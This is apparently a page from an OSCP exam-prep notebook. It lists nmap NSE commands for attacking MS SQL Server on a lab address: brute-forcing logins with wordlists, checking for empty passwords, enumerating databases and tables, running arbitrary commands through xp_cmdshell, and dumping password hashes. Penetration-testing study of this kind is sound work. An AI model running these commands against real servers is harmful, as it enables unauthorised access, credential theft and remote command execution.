✍️
OSCP Prep
  • Welcome Aboard
  • Linux Basics
    • Command Line Fundamentals
  • Writeups
    • HackTheBox
      • Windows
        • Granny
        • Devel
        • Blue
        • Legacy
      • Linux
        • shocker
    • OSPG
    • TryHackMe
    • Vulnhub
      • Kioptrix Level1
  • Scanning and Enumeration
    • Index
    • Wordpress
      • wpscan
    • NMAP
    • DNS
    • NFS
    • DB
      • Oracle DB 1521
      • MySQL
    • SMB
      • msfconsole
      • crackmapexec
      • smbmap
      • smbclient
      • enum4linux
      • Mount smb share locally
    • SSH
    • HTTP
      • PUT Method
      • Untitled
  • Tools and Techniques
    • File Transfer
    • CMD-Fu
    • Cross Platform Exploit Compilation
    • Bash-Fu
    • Sniffing
      • tcpdump
      • Wireshark
    • Brute Force
      • Untitled
      • Hydra
    • Msfvenom
    • Password Cracking
      • John
      • Hashcat
  • Gaining Access and Exploitation
  • SQL Injection
    • sqlmap
    • mysql syntax
    • ms sql syntax
  • File Upload
  • LFI
  • Privilege Escalation
    • Windows
      • references links
      • Manual
        • SeTokenImpersonate
      • Scripts
    • Linux
      • Manual
        • Know your Enemy
      • Scripts
  • Mislu Tips
    • Troubleshooting
  • Buffer OverFlow under 30 min.
    • point n shoot
    • fuzzer.py
    • Addons reading material
  • Active Directory
    • Untitled
Powered by GitBook
On this page

Was this helpful?

  1. SQL Injection

ms sql syntax

pentestlab link testing mssql with nmap Tally HTB ippsec -- ms sql rev shell + command execution

nmap -p1433 --script ms-sql-info 10.11.1.31

#discovering basic info regarding db

nmap -p1433 --script ms-sql-brute 10.11.1.31

#to bruteforce / checking weak Ms SQL a/c passwords

nmap -p1433 --script ms-sql-brute --script-args userdb=/usr/share/wordlist/rockyou.txt, passdb=/usr/share/wordlists/passlist.txt 10.11.1.31

#using custom wordlist to bruteforce

nmap -p1433 --script ms-sql-empty-password 10.11.1.31

#checking for null passwords

nmap -p1433 --script ms-sql-hasdbaccess.nse --script-args mssql.username=sam 10.11.1.31

# to check what all databases are allowed to sam user

nmap -p1433 --script ms-sql-tables --script-args mssql.username=sam 10.11.1.31

#to list tables in database , will list the columns as well

nmap -p1433 -sV 10.11.1.31

In 2000 version of Ms SQL Server xp_cmdshell was enabled by default so we can do command execution as well

nmap -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sam 10.11.1.31

#to check for command execution on xp servers

nmap -p1433 --script ms-sql-xp-cmdshell --script-args=ms-sql-xp-cmdshell.cmd='whoami' , mssql.username=sam 10.11.1.31

#running arbitrary command on server

nmap -p1433 --script ms-sql-dump-hashes --script-args mssql.username=sam 10.11.1.31

#for dumping ms sql hashes
Previousmysql syntaxNextFile Upload

Last updated 3 years ago

Was this helpful?